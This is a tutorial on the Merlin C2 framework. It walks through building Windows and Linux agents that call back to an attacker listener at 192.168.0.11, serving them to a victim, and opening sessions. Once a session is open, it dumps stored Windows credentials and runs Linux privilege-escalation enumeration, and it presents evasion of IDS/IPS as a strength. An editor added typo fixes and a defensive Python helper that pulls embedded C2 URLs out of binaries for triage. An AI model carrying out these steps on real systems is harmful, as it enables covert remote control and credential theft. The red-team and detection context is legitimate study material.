In this article, we learn how to use the Merlin C2 tool. It is developed by Russel Van Tuyl in the Go language.
Table of content:
- Introduction
- Installation
- Windows exploitation
- Windows post exploitation
- Linux exploitation
- Linux post exploitation
Introduction
Merlin is a great cross-platform command and control tool written in Go. It is made of two elements: the server and the agent. It communicates over the HTTP/2 protocol. The best thing about Merlin is that it compiles to run on any platform and that you can even build it from source. Normally agents are placed on Windows and the listener runs on Linux, but because Merlin is written in Go it lets us place agents on any platform/machine we come across and run the listener on any platform as well. This makes it more successful than other tools in red teaming, as IDS/IPS struggle to identify it.
The Merlin server is to be run where agents can call out to it. By default the server is configured to listen on 127.0.0.1:443, but you can change it to your own IP. The Merlin agent, as discussed earlier, can be cross-compiled to run on any platform. Agents are interacted with through the Merlin server. Any binary is executed using the target's PATH variable.
Installation
Merlin's installation is pretty tricky. The most convenient way to download it is shown in this article. Installing Go is compulsory for Merlin to work, so to install Go type:
apt install golang
And then, to install Merlin, run the following commands:
mkdir /opt/merlin;cd /opt/merlin
wget https://github.com/Ne0nd0g/merlin/releases/download/v0.1.4/merlinServer-Linux-x64-v0.1.4.7z
Once the above commands have executed successfully, use the following command to unpack the Merlin server:
7z x merlinServer-Linux-x64-v0.1.4.7z
Now, after unpacking, when you use the ls command you will find the Merlin server binary and a readme file. We can check that the server starts by using the following command:
./merlinServer-Linux-x64
In "README.MD" we find the instructions for installing Merlin on our system. According to the readme file, we have to set up the GOPATH environment variable for the installation and then install Merlin using "go get" instead of git clone. So, to complete these steps, run the following set of commands:
echo "export GOPATH=$HOME/go" >> .bashrc
source .bashrc
go get github.com/Ne0nd0g/merlin
Once the directory is downloaded, let's check its contents using the cd and ls commands. There is a cmd directory, and in it a directory named merlinserver where we find main.go. Run main.go as shown in the image below:
go run main.go
As you can see, Merlin is still not running properly because no SSL certificate has been given to it. If you navigate through the /opt/merlin directory, you will find a directory named data which contains an SSL certificate. Copy the data folder into the merlinserver directory as shown in the image below:
Now if you run Merlin using the command go run main.go, the Merlin server will start successfully.
Using the following help command you can see, as shown in the image, the arguments you can use to run the server as desired:
go run main.go -h
Windows exploitation
Now, to build the Merlin agent for Windows, type the following command (this builds the agent's main.go, not the server's; the original command had a typo, -ldlags, which is corrected here):
GOOS=windows GOARCH=amd64 go build -ldflags "-X main.url=https://192.168.0.11:443" -o shell.exe main.go
Now, share the shell with the target using a Python web server:
python -m SimpleHTTPServer 80
To create a listener for the shell to connect back to, use the following command:
go run main.go -i 192.168.0.11
And just like that, you will have your session as shown in the image above. Now use the help command to see all the options, as shown in the image below:
Type sessions to see the list of sessions you have acquired, as shown in the image below:
To access an available session, use the following command:
interact
Once you have accessed the session, you can run Windows commands from it, such as:
shell ipconfig
Further, you can use various post-exploitation modules, a list of which is shown in the image below:
Windows post exploitation
We will use a module here to dump Windows credentials. To activate the said post-exploitation module, type:
use module windows/x64/powershell/credentials/dumpCredStore
As you can see in the image above, the info command gives us all the details about the module, including the options we need to specify. So let's set the options and run it:
set agent
run
Linux exploitation
Now we will build a Merlin agent for a Linux machine. Again this is the agent's main.go. Simply type the following command:
export GOOS=linux; export GOARCH=amd64; go build -ldflags "-s -w -X main.url=https://192.168.0.11:443" -o shell.elf main.go
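Both the Windows and the Linux build above inject the C2 URL at link time with -ldflags "-X main.url=...". From a triage point of view it is worth knowing that this value is stored as a plain string in the resulting binary, and that -s -w only strips the symbol table and DWARF debug information: the URL and the Go runtime function names kept in the pclntab remain readable. The following Python helper, added here as an example and not part of the original post or the Merlin project, pulls printable strings and embedded URLs out of a binary the way the strings utility would. The sample bytes are constructed inline to stand in for a captured agent; the Go-binary check is a heuristic and is labelled as such.

```python
import re
from typing import List

# Constructed sample: a few bytes imitating fragments of a compiled agent.
# The https URL is the kind of value injected with -ldflags "-X main.url=...".
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8      # ELF magic (too short to count as a string)
    + b"runtime.main\x00"                         # pclntab function name, survives -s -w
    + b"https://192.168.0.11:443\x00"             # embedded C2 URL (constructed)
    + b"\x01\x02\x03"                             # non-printable filler
    + b"net/http\x00"
    + b"runtime.gopanic\x00"
)

# http(s) URL: host, optional port, optional path up to whitespace/NUL/quote.
URL_RE = re.compile(rb"https?://[A-Za-z0-9.\-]+(?::\d{1,5})?(?:/[^\s\x00\"']*)?")


def printable_strings(blob: bytes, min_len: int = 4) -> List[str]:
    """Return runs of printable ASCII of at least min_len bytes (like `strings`)."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(blob)]


def embedded_urls(blob: bytes) -> List[str]:
    """Extract distinct http(s) URLs that appear as plain text in the binary."""
    found: List[str] = []
    for s in printable_strings(blob):
        for m in URL_RE.finditer(s.encode("ascii")):
            url = m.group().decode("ascii")
            if url not in found:
                found.append(url)
    return found


def go_runtime_markers(blob: bytes) -> List[str]:
    """Heuristic: Go binaries keep 'runtime.*' function names even when built with -s -w."""
    return [s for s in printable_strings(blob) if s.startswith("runtime.")]


def triage(blob: bytes) -> dict:
    """Summarise what a defender would note about a suspicious binary."""
    markers = go_runtime_markers(blob)
    return {
        "urls": embedded_urls(blob),
        "go_runtime_markers": markers,
        "likely_go_binary": len(markers) > 0,   # heuristic, not proof
    }


if __name__ == "__main__":
    print(triage(SAMPLE_BINARY))
```

On a real file, read it with open(path, "rb").read() and pass the bytes to triage(); the URL it reports is the listener the agent will try to reach, which is the indicator to block and to search for in proxy and DNS logs.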
Once the command has executed, your agent binary is created. Use Python to share the file with the victim as shown in the image below, or however you see fit. To start a Python HTTP server:
python -m SimpleHTTPServer 80
Set up the listener and wait for the file to be executed (the original command used -I; the server flag is lowercase -i, as in the Windows section):
go run main.go -i 192.168.0.11
As shown in the image above, you will have your session. Then type sessions to see the list of sessions gained.
Then, to access the session, use the following command:
interact
From there you can run any Linux command, such as:
shell ls
Linux post exploitation
Even on Linux you can use a number of post-exploitation modules. The one we will use in this article is privesc/LinEnum (the original command had a typo, priesc, which is corrected here):
use module linux/x64/bash/privesc/LinEnum
Through the info command we learn that we have to give it an agent in order to run this module. So, type:
set agent
run
And this way your module will run. Try working with the Merlin C2 tool, as it is one of the best, and as you can see it is conveniently cross-platform.